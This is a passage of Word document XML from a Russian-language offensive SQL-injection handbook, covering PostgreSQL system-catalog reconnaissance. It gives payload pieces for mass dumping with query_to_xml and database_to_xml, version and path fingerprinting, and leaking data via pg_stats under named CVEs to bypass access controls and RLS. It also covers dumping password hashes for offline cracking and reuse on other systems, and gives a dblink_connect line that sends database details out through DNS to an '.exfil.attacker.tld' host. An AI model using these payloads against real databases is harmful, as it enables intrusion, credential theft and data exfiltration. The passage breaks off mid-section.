          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_class</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pg_attribute</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_proc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_roles</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_settings</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_extension</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> читает любая аутентифицированная роль. SELECT на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (содержит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rolpassword</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с хешами) и view </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_shadow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — только superuser. Полная модель привилегий — см. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.2</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF1A665" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Массовый дамп одной функцией.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>query_to_xml('SELECT * FROM t', true, false, '')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>database_to_xml(true, false, '')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>table_to_xml('t'::regclass, true, false, '')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> дампят запрос/таблицу/всю БД в XML за один вызов. Payload помещается в один UNION-блок без подбора количества колонок и без chunked-эксфильтрации.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7489705E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Утечка через статистику.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stats</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stats_ext</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — view с агрегатами планировщика (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>most_common_vals</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>histogram_bounds</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Из-за </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CVE-2024-4317</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (до 16.3/15.7/14.12) и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CVE-2025-8713</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (до 17.6/16.10/15.14/14.19/13.22) фрагменты данных утекают </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>без SELECT-привилегии на исходную колонку и с обходом RLS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — этого паттерна у MySQL нет вовсе.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A8B3C4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Структура подразделов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E055C83" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.8.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_class</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_namespace</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_attribute</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — карта схем, таблиц, колонок.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBB0687" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.8.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_proc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — список функций, их сигнатуры, языки, owner-ы, тело (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>prosrc</w:t>
      </w:r>
      <w:r>
        <w:t>). Пререквизит к 3.13 (SECURITY DEFINER функции для эскалации).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F6231C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.8.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_shadow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (требует SUPERUSER) и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_roles</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (PUBLIC, но без хешей).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18ADE09C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.8.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Fingerprinting через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>version()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>current_setting('server_version_num')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>current_setting('data_directory')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>current_database()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — определение версии для выбора применимой цепочки CVE из раздела 4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618E88AD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.8.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>query_to_xml()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>database_to_xml()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>table_to_xml()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — массовый дамп.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341E440B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.8.6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Утечка через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stats</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stats_ext</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — обход ACL/RLS через optimizer statistics (R17 CVE-2024-4317, R26 CVE-2025-8713).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082522C1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Граница с другими категориями</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B307E7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1 (UNION-based) vs 3.8.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3.1 — про извлечение строк из пользовательских таблиц через подобранный UNION. 3.8 — про извлечение метаданных через системные каталоги. На практике связка обязательна: UNION (3.1) — это транспорт; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_class</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_attribute</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (3.8.1) — это контент.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5642EED3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.6 (OOB) vs 3.8.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3.8 предполагает, что HTTP-ответ видим (UNION/error-based возвращает результат прямо в response). 3.6 — про невидимый канал (DNS/TCP/файлы). Метаданные ортогональны каналу: формула «3.8-payload внутри 3.6-обёртки» — это OOB-разведка карты БД (например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dblink_connect('host=' || (SELECT version()) || '.exfil.attacker.tld ...')</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D1008C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13 (Privilege escalation) vs 3.8.3.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3.8.3 предполагает, что superuser уже есть — это про дамп </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid.rolpassword</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для оффлайн-подбора и атаки на другие системы, где переиспользованы те же пароли. 3.13 — про получение superuser-а с нуля. Связка: 3.13 → 3.8.3 как пост-эксплуатация.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0EEA47" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.8.6 vs 3.17 (RLS-обходы).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3.8.6 — утечка через optimizer statistics, конкретный регрессионный класс CVE; в 3.17 (3.17.4) этот же вектор разбирается с точки зрения именно RLS-моделирования.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503E8374" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Привилегии по подразделам</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2DD6441B"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945D4EE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Подраздел</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706757E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Минимальная привилегия для базового payload-а</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="35ED66F2"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FF97C7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.8.1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6E6A35" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PUBLIC (любая аутентифицированная роль)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="64AA932C"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9316C5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.8.2</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DD80FE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">PUBLIC для имён/сигнатур; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>prosrc</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> plpgsql-функций — owner или явный GRANT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="3FF10F53"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DCE568" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.8.3</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59D298" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">SUPERUSER (для </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>rolpassword</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">); </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>pg_roles</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> без хешей — PUBLIC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="697096EC"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E5B19B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.8.4</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DB419B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PUBLIC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="37C2BA6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ABDBE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.8.5</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2DEBFA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">PUBLIC + SELECT на дампируемой таблице (для </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>table_to_xml</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="6EAF52AD"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74C5B9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.8.6</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D223AC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PUBLIC + регрессия CVE-2024-4317 или CVE-2025-8713 (обход ACL/RLS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5703A4D7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Эта таблица — заменитель блока «Требования к среде» в карточках 3.8.1–3.8.6 в части привилегий. В каждой карточке оставлен короткий пункт «Привилегии: см. таблицу в 3.8.0», специфика версий и расширений по-прежнему расписана детально.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D7BED2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3.8.1 pg_class, pg_namespace, pg_attribute — карта схем, таблиц, колонок</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC05BA7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Суть.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Три системных каталога однозначно описывают всю структуру БД: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_namespace</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — схемы, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
